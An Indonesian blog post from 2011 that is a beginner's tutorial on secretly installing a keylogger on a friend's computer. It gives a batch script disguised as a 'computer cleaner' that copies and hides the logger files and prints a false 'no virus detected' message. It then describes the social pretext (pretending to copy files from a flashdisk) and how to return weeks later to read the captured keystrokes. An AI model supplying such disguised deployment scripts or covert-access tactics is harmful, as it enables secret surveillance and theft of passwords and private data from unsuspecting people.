PEDASS BELAJAR KEYLOGGER

Sabtu, 12 Maret 2011

ASSALAMU'ALAIKUM SOBAT.

Ketemu lagi sama Pedass, nah kali ini, Pedass bakalan belajar hack.. yah.. sebelumnya hack adalah meretas, jadi sebelum belajar, kita harus melakukan hal hal di bawah ini

1. Siapkan Komputer
2. Nyalakan Komputer
3. Niat dalam hati untuk belajar
4. Yakin untuk baik baik
5. Buka Notepad!!!

Baiklah ada macam cara untuk meretas, namun kali ini, Pedass bakalan belajar yang namanya keylogger, yah keylogger itu adalah suatu cara yang menggunakan third party ato bikinan sendiri dengan vb atao notepad. Cara kerja keylogger ini adalah dengan merekam semua aktivitas keyboard dan program yang terinfeksi (infeksi = sudah di 'run') setiap angka/huruf ato apa pun yang di tekan di keyboard.

Kali ini teman kita adalah software yang bernama nav32.exe ---> program keylogger dari norton anti virus... dimana yah download nya? akan menyusul

Yup langsung aja, udah buka notepad kan?

1. Ketik script ini di notepad anda..

@echo off
title pembersih komputer ::..by, dimboh..::
copy navw32.exe D:\
copy navw32.dll D:\
attrib +h D:\navw32.dll
echo.

echo Selesai... tidak ada virus terdeteksi, anda aman!
navw32.exe
exit

Ini adalah script untuk mengelabui sistem komputer teman teman, dengan menggunakan cmd copy = yang artinya file nav itu akan di copy ke D:\ atau direktori yang bakalan dituju.

klik save as, lalu jangan lupa untuk ganti file type jadi all files, lalu simpan dengan nama project1.bat ingat, .bat !!! bukan yang lain.



Finishing nya?
Copy project1.bat itu ke flashdisk beserta software navw32.exe nya.. untuk menjalankan nya, sebenarnya bisa di manipulasi, namun hanya ngefek ke windows xp. jadi kita pura pura mau ngopi file aja ke temen, saat kita nancepin flashdisk, langsung aja buka nav.bat, maka akan tercopy otomatis.


PANEN?

GAMPANG, tunggu 2 - 3 minggu lagi, datang ke laptop/korban, pura pura ngopi file, terus buka ke direktori dimana kita mengopy navw32.exe nya, eittttt.... show hidden files dulu ya, setelah itu pasti ada navw32.dll, nah itu tinggal di openwith dengan notepad.. silahkan anda panen sendiri!!!!


Copyrights Dimbo Hetfield

Share This Post

7 comments:

Posting Komentar